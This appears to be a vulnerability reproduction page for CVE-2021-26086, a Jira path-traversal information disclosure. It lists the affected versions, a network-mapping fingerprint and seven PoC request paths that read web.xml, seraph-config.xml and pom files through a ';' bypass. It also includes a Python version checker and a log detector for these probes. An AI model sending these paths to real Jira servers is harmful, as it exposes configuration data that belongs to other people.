# Atlassian Jira Sensitive Information Disclosure CVE-2021-26086

## Vulnerability Description

Jira is a project and issue tracking tool from Atlassian, widely used for defect tracking, customer service, requirements gathering, process approval, task tracking, project tracking, and agile management.

Reference:

- https://jira.atlassian.com/browse/JRASERVER-72695

## Affected Versions

```
version < 8.5.14
8.6.0 ≤ version < 8.13.6
8.14.0 ≤ version < 8.16.1
```

## Network Mapping

```
app="ATLASSIAN-JIRA"
```

## Reproduction

PoC:

```
/s/cfx/_/;/WEB-INF/web.xml
/s/cfx/_/;/WEB-INF/decorators.xml
/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
```
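
A defender-side check for the material above, as an added example that is not part of the original page: it tests a Jira version string against the affected ranges listed here and flags access-log requests with the same path shape as the PoC requests. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Affected ranges as listed on this page: lower bound inclusive, upper bound exclusive
AFFECTED = [((0, 0, 0), (8, 5, 14)), ((8, 6, 0), (8, 13, 6)), ((8, 14, 0), (8, 16, 1))]

def parse_version(text):
    """Turn '8.13.5' into (8, 13, 5); missing parts count as 0."""
    parts = [int(p) for p in text.strip().split(".")[:3]]
    return tuple(parts + [0] * (3 - len(parts)))

def is_affected(version):
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED)

# Path shape of the PoC requests: /s/<segment>/_/; followed by WEB-INF or META-INF
PROBE = re.compile(r"/s/[^/]+/_/;[^/]*/(WEB-INF|META-INF)/", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def decode_path(path):
    """Percent-decode (bounded) because access logs record the raw request line."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def find_probes(log_lines):
    """Return (logged path, HTTP status) for each request matching the PoC path shape."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m and PROBE.search(decode_path(m.group(1))):
            hits.append((m.group(1), int(m.group(2))))
    return hits

# Constructed sample access-log lines (documentation IP ranges), not real traffic
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2021:10:00:01 +0000] "GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1" 200 4821',
    '192.0.2.10 - - [01/Sep/2021:10:00:02 +0000] "GET /s/abc/_/%3b/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1" 404 0',
    '198.51.100.7 - - [01/Sep/2021:10:00:05 +0000] "GET /s/d41d8cd9/_/download/batch/jira.webresources/x.js HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for path, status in find_probes(SAMPLE_LOG):
        print(status, path)
```

A 200 status on a flagged request means the file was served, so its contents should be treated as disclosed.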